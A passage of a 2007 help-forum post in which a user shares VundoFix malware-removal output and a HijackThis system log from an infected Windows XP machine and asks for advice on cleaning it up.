Attempting to delete C:\WINDOWS\system32\gebcdab.dll C:\WINDOWS\system32\gebcdab.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\gebywuv.dll C:\WINDOWS\system32\gebywuv.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\gebywxv.dll C:\WINDOWS\system32\gebywxv.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\gebyxwt.dll C:\WINDOWS\system32\gebyxwt.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\gebyxxu.dll C:\WINDOWS\system32\gebyxxu.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\gebyxyy.dll C:\WINDOWS\system32\gebyxyy.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hggedax.dll C:\WINDOWS\system32\hggedax.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hggefcy.dll C:\WINDOWS\system32\hggefcy.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hggfdde.dll C:\WINDOWS\system32\hggfdde.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hggffcb.dll C:\WINDOWS\system32\hggffcb.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hggffgg.dll C:\WINDOWS\system32\hggffgg.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hggfgeb.dll C:\WINDOWS\system32\hggfgeb.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hgggdab.dll C:\WINDOWS\system32\hgggdab.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hgggddc.dll C:\WINDOWS\system32\hgggddc.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hgggefe.dll C:\WINDOWS\system32\hgggefe.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hgggged.dll C:\WINDOWS\system32\hgggged.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\hgghiii.dll C:\WINDOWS\system32\hgghiii.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\iifcaby.dll C:\WINDOWS\system32\iifcaby.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\iifcbxw.dll C:\WINDOWS\system32\iifcbxw.dll Has been deleted! 
Attempting to delete C:\WINDOWS\system32\iifdbxw.dll C:\WINDOWS\system32\iifdbxw.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\iiffcca.dll C:\WINDOWS\system32\iiffcca.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\iifgeeb.dll C:\WINDOWS\system32\iifgeeb.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\jkkjheb.dll C:\WINDOWS\system32\jkkjheb.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\jkkjijk.dll C:\WINDOWS\system32\jkkjijk.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\jkkkjgf.dll C:\WINDOWS\system32\jkkkjgf.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\jkkklmj.dll C:\WINDOWS\system32\jkkklmj.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\khfcawu.dll C:\WINDOWS\system32\khfcawu.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\khfcdbc.dll C:\WINDOWS\system32\khfcdbc.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\khfdefd.dll C:\WINDOWS\system32\khfdefd.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\khfedeb.dll C:\WINDOWS\system32\khfedeb.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\khfeedc.dll C:\WINDOWS\system32\khfeedc.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\khffcax.dll C:\WINDOWS\system32\khffcax.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\khfggfc.dll C:\WINDOWS\system32\khfggfc.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\ljjgeda.dll C:\WINDOWS\system32\ljjgeda.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\ljjghhi.dll C:\WINDOWS\system32\ljjghhi.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\ljjhfec.dll C:\WINDOWS\system32\ljjhfec.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\mljgeef.dll C:\WINDOWS\system32\mljgeef.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\mljhhhh.dll C:\WINDOWS\system32\mljhhhh.dll Has been deleted! 
Attempting to delete C:\WINDOWS\system32\mljjhhe.dll C:\WINDOWS\system32\mljjhhe.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\mljjhig.dll C:\WINDOWS\system32\mljjhig.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\mljjihg.dll C:\WINDOWS\system32\mljjihg.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\mljjihh.dll C:\WINDOWS\system32\mljjihh.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\mljkihi.dll C:\WINDOWS\system32\mljkihi.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnliif.dll C:\WINDOWS\system32\nnnliif.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnliij.dll C:\WINDOWS\system32\nnnliij.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnlkhe.dll C:\WINDOWS\system32\nnnlkhe.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnmkih.dll C:\WINDOWS\system32\nnnmkih.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnmljg.dll C:\WINDOWS\system32\nnnmljg.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnmnml.dll C:\WINDOWS\system32\nnnmnml.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnnllj.dll C:\WINDOWS\system32\nnnnllj.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnoono.dll C:\WINDOWS\system32\nnnoono.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnooop.dll C:\WINDOWS\system32\nnnooop.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\nnnopmn.dll C:\WINDOWS\system32\nnnopmn.dll Has been deleted! Attempting to delete C:\WINDOWS\System32\nqstv.bak1 C:\WINDOWS\System32\nqstv.bak1 Has been deleted! Attempting to delete C:\WINDOWS\System32\nqstv.bak2 C:\WINDOWS\System32\nqstv.bak2 Has been deleted! Attempting to delete C:\WINDOWS\System32\nqstv.ini C:\WINDOWS\System32\nqstv.ini Has been deleted! Attempting to delete C:\WINDOWS\system32\opnkkji.dll C:\WINDOWS\system32\opnkkji.dll Has been deleted! 
Attempting to delete C:\WINDOWS\system32\opnliff.dll C:\WINDOWS\system32\opnliff.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\opnliig.dll C:\WINDOWS\system32\opnliig.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\opnmjig.dll C:\WINDOWS\system32\opnmjig.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\opnmkli.dll C:\WINDOWS\system32\opnmkli.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\opnmnmn.dll C:\WINDOWS\system32\opnmnmn.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\opnollk.dll C:\WINDOWS\system32\opnollk.dll Could not be deleted. Attempting to delete C:\WINDOWS\system32\opnoomk.dll C:\WINDOWS\system32\opnoomk.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\opnoopm.dll C:\WINDOWS\system32\opnoopm.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\pmnmnnl.dll C:\WINDOWS\system32\pmnmnnl.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\qomjhfe.dll C:\WINDOWS\system32\qomjhfe.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\qomjjkk.dll C:\WINDOWS\system32\qomjjkk.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\qomkjge.dll C:\WINDOWS\system32\qomkjge.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\qomljge.dll C:\WINDOWS\system32\qomljge.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\qommkij.dll C:\WINDOWS\system32\qommkij.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\qommnlm.dll C:\WINDOWS\system32\qommnlm.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\qomnmnl.dll C:\WINDOWS\system32\qomnmnl.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\qomnnoo.dll C:\WINDOWS\system32\qomnnoo.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\rqromlm.dll C:\WINDOWS\system32\rqromlm.dll Has been deleted! Attempting to delete C:\WINDOWS\system32\rqromnk.dll C:\WINDOWS\system32\rqromnk.dll Has been deleted! 
Attempting to delete C:\WINDOWS\system32\rqroool.dll
C:\WINDOWS\system32\rqroool.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\rqrpolj.dll
C:\WINDOWS\system32\rqrpolj.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\rqrqrpm.dll
C:\WINDOWS\system32\rqrqrpm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\rqrqrss.dll
C:\WINDOWS\system32\rqrqrss.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\sgqdqaux.ini
C:\WINDOWS\system32\sgqdqaux.ini Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqnkhi.dll
C:\WINDOWS\system32\ssqnkhi.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqnkki.dll
C:\WINDOWS\system32\ssqnkki.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqnnmn.dll
C:\WINDOWS\system32\ssqnnmn.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqnolk.dll
C:\WINDOWS\system32\ssqnolk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqolki.dll
C:\WINDOWS\system32\ssqolki.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqomnl.dll
C:\WINDOWS\system32\ssqomnl.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqonmj.dll
C:\WINDOWS\system32\ssqonmj.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqoopm.dll
C:\WINDOWS\system32\ssqoopm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqpmnk.dll
C:\WINDOWS\system32\ssqpmnk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqpmnm.dll
C:\WINDOWS\system32\ssqpmnm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqpopq.dll
C:\WINDOWS\system32\ssqpopq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqpqqp.dll
C:\WINDOWS\system32\ssqpqqp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqqnkk.dll
C:\WINDOWS\system32\ssqqnkk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqqool.dll
C:\WINDOWS\system32\ssqqool.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqrrop.dll
C:\WINDOWS\system32\ssqrrop.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvsttr.dll
C:\WINDOWS\system32\tuvsttr.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvurqr.dll
C:\WINDOWS\system32\tuvurqr.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvuuvw.dll
C:\WINDOWS\system32\tuvuuvw.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvvsst.dll
C:\WINDOWS\system32\tuvvsst.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvvuvv.dll
C:\WINDOWS\system32\tuvvuvv.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvvvww.dll
C:\WINDOWS\system32\tuvvvww.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvwurp.dll
C:\WINDOWS\system32\tuvwurp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvwxxy.dll
C:\WINDOWS\system32\tuvwxxy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqnlji.dll
C:\WINDOWS\system32\urqnlji.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqnllm.dll
C:\WINDOWS\system32\urqnllm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqolii.dll
C:\WINDOWS\system32\urqolii.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqpqnl.dll
C:\WINDOWS\system32\urqpqnl.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqqqoo.dll
C:\WINDOWS\system32\urqqqoo.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqrqqn.dll
C:\WINDOWS\system32\urqrqqn.dll Has been deleted!

Attempting to delete C:\WINDOWS\System32\vtsqn.dll
C:\WINDOWS\System32\vtsqn.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vturqrq.dll
C:\WINDOWS\system32\vturqrq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vturrom.dll
C:\WINDOWS\system32\vturrom.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtusqrr.dll
C:\WINDOWS\system32\vtusqrr.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtusrsq.dll
C:\WINDOWS\system32\vtusrsq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtusrss.dll
C:\WINDOWS\system32\vtusrss.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtuttqq.dll
C:\WINDOWS\system32\vtuttqq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtuurom.dll
C:\WINDOWS\system32\vtuurom.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtuuvtt.dll
C:\WINDOWS\system32\vtuuvtt.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvuroon.dll
C:\WINDOWS\system32\wvuroon.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvussqp.dll
C:\WINDOWS\system32\wvussqp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvutqom.dll
C:\WINDOWS\system32\wvutqom.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvuurpm.dll
C:\WINDOWS\system32\wvuurpm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvuvwxy.dll
C:\WINDOWS\system32\wvuvwxy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xuaqdqgs.dll
C:\WINDOWS\system32\xuaqdqgs.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxyvuts.dll
C:\WINDOWS\system32\xxyvuts.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxywtst.dll
C:\WINDOWS\system32\xxywtst.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxywvwu.dll
C:\WINDOWS\system32\xxywvwu.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxywwtt.dll
C:\WINDOWS\system32\xxywwtt.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxyxxus.dll
C:\WINDOWS\system32\xxyxxus.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxyyyxy.dll
C:\WINDOWS\system32\xxyyyxy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yayayab.dll
C:\WINDOWS\system32\yayayab.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yayvuur.dll
C:\WINDOWS\system32\yayvuur.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yaywurs.dll
C:\WINDOWS\system32\yaywurs.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yaywuuu.dll
C:\WINDOWS\system32\yaywuuu.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yayxwts.dll
C:\WINDOWS\system32\yayxwts.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yayyxyy.dll
C:\WINDOWS\system32\yayyxyy.dll Has been deleted!

Attempting to delete C:\WINDOWS\System32\yudpdsvv.dll
C:\WINDOWS\System32\yudpdsvv.dll Has been deleted!

Performing Repairs to the registry.
Done!

VundoFix V6.3.5

Checking Java version...
Java version is 1.5.0.8

Scan started at 4:33:02 PM 2/5/2007

Listing files found while scanning....
C:\WINDOWS\system32\opnollk.dll
C:\WINDOWS\System32\yudpdsvv.dll

Beginning removal...

Attempting to delete C:\WINDOWS\system32\opnollk.dll
C:\WINDOWS\system32\opnollk.dll Has been deleted!

Performing Repairs to the registry.
Done!

VundoFix V6.3.5

Checking Java version...
Java version is 1.5.0.8

Scan started at 4:45:20 PM 2/5/2007

Listing files found while scanning....
C:\WINDOWS\System32\yudpdsvv.dll

Beginning removal...

Performing Repairs to the registry.
Done!

VundoFix V6.3.5

Checking Java version...
Java version is 1.5.0.8

Scan started at 4:50:23 PM 2/5/2007

Listing files found while scanning....
C:\WINDOWS\System32\yudpdsvv.dll

Beginning removal...

Performing Repairs to the registry.
Done!
------------------------------------------------------------------------
Below is the HIJACKTHIS.LOG after using VundoFix:

Logfile of HijackThis v1.99.1
Scan saved at 4:57:31 PM, on 2/5/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Spyware Nuker\swnxt.exe
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\mysvcc.exe
C:\WINDOWS\system32\srrvc.exe
C:\WINDOWS\System32\svcchost.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\WINDOWS\system32\mfcee.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\kavss.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\Documents and Settings\Sys\4.exe
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - C:\WINDOWS\System32\opnollk.dll (file missing)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - C:\WINDOWS\System32\yudpdsvv.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SWN2] C:\Program Files\Spyware Nuker\swnxt.exe /h
O4 - HKLM\..\Run: [DSLSTATEXE] C:\Program Files\GlobespanVirata\Adsl\dslstat.exe icon
O4 - HKLM\..\Run: [DSLAGENTEXE] C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [mysvcig38] mysvcc.exe
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [msvcc25] svcchost.exe
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] C:\PROGRA~1\eScan\TRAYICOS.EXE /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKLM\..\Run: [melg34] C:\Documents and Settings\Sys\4.exe
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\RunServices: [mysvcig38] mysvcc.exe
O4 - HKLM\..\RunServices: [msvcc25] svcchost.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKCU\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKCU\..\Run: [melg34] C:\Documents and Settings\Sys\4.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe

Please check and advise on my system errors.

Post #4, Feb 5 2007, 11:02 PM (Moderator)
